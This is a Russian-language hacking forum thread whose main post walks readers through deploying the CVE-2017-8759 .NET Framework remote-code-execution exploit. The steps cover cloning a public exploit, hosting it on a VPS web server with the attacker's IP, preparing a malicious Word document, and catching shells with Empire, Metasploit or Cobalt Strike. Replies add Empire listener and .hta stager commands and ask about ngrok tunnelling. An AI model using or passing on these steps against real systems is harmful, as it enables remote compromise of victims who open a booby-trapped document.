• 15 апреля стартует «Курс «SQL-injection Master» ©» от команды The Codeby

    За 3 месяца вы пройдете путь от начальных навыков работы с SQL-запросами к базам данных до продвинутых техник. Научитесь находить уязвимости связанные с базами данных, и внедрять произвольный SQL-код в уязвимые приложения.

    На последнюю неделю приходится экзамен, где нужно будет показать свои навыки, взломав ряд уязвимых учебных сайтов, и добыть флаги. Успешно сдавшие экзамен получат сертификат.

    Запись на курс до 25 апреля. Получить промодоступ ...

Windows NET Framework Exploit CVE-2017-8759

Ondrik8

prodigy
Green Team
08.11.2016
1 129
3 187
BIT
0
Всем привет, познакомлю Вас с методикой атак: Exploit CVE-2017-8759 (Microsoft Windows .NET Framework RCE)

Screenshot_37.png




Screenshot_38.png


https://github.com/bhdresh/CVE-2017-8759

https://github.com/Voulnet/CVE-2017-8759-Exploit-sample


Будем проводить атаку совместно с Empire, перейдем в папку где крутится сервис Apache : cd /var/www/html

от себя скажу что все это дело запускаем на VPS-e это для боевых условий!

копируем скрипт в папку html : git clone https://github.com/Voulnet/CVE-2017-8759-Exploit-sample

перейдем в нее и удалим лишнее : rm -rf cmd.hta LICENSE README.md

запустим сервис Apache : servise apache2 start

отредактируем exploit.txt , а именно поставим свой IP в 14 строке.

Screenshot_39.png



далее отредактируем файл: Doc1.doc , настроим его макрос:

Screenshot_40.png


Настраиваем Empire :

Screenshot_41.png


Screenshot_42.png


настраиваем порт (или корректируем все ранее): python -m SimpleHTTPServer 8080

можно еще и так (видео)


Metasploit


cobalt-strike


Удачи!)
 
D

Dietrich

а почему это сплойт если используется макрос?
 
D

Dietrich

к чему мне ссылка ? Вопрос в том, почему исполняемый файл это док макрос? И названо эксплойтом.
Если макрос -метод доставки. Я может неправильно понял тс.
далее отредактируем файл: Doc1.doc , настроим его макрос:
 
Последнее редактирование модератором:

persivald

Green Team
24.07.2017
56
71
BIT
0
к чему мне ссылка эта? Вопрос в том, почему исполняемый файл это док макрос? И названо эксплойтом
помоему ты не внимательно читал, дружище) сам макрос использует уязвимость netframework-а функции SOAP таким образом, что он вызывает удалённый файл и приводит к исполнению кода этого файла
смысл в том, что даже если у цели не включено исполнение макросов, сплойт всё равно сработает
ещё добавлю, на будущее, открывайте ссылку на експлойт-дб и читайте, автор не просто так их здесь выкладывает)
 
Последнее редактирование:
O

OmLeT

Прошу прощения, не могли бы вы сбросить код макроса, ибо не могу разглядеть
 

persivald

Green Team
24.07.2017
56
71
BIT
0

First-freeman

Green Team
13.03.2016
15
2
BIT
0
Для тех кто будет использовать Empire, хочу предупредить, что была выпущена новая версия, а мануалы все старые. Дело в том, что там немного поменяли синтаксис команд. Соответственно, для создания "наблюдателя", необходимо после ввода "listeners" ввести "uselistener http". Только после этого появится возможность ввести свои данные. И при создании .hta, с начала необходимо ввести set Listener <имя созданого наблюдателя>, далее все как на скриншоте. Спасибо за статью!
 
  • Нравится
Реакции: Сергей Попов

Tihon49

Green Team
06.01.2018
193
120
BIT
0
Можно соединить этот эксплойт с ngrok? Думается что да, можно. Тогда второй вопрос: в видео где юзается msfconsole (2-ое видео) при создании нагрузки указывается только ip атакующего, а как же порт? Его что, не обязательно указывать? И при создании туннеля через ngrok порт будет хрен пойми с каким номером... Объясните, кому не лень. Чую что всё очень просто )))
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!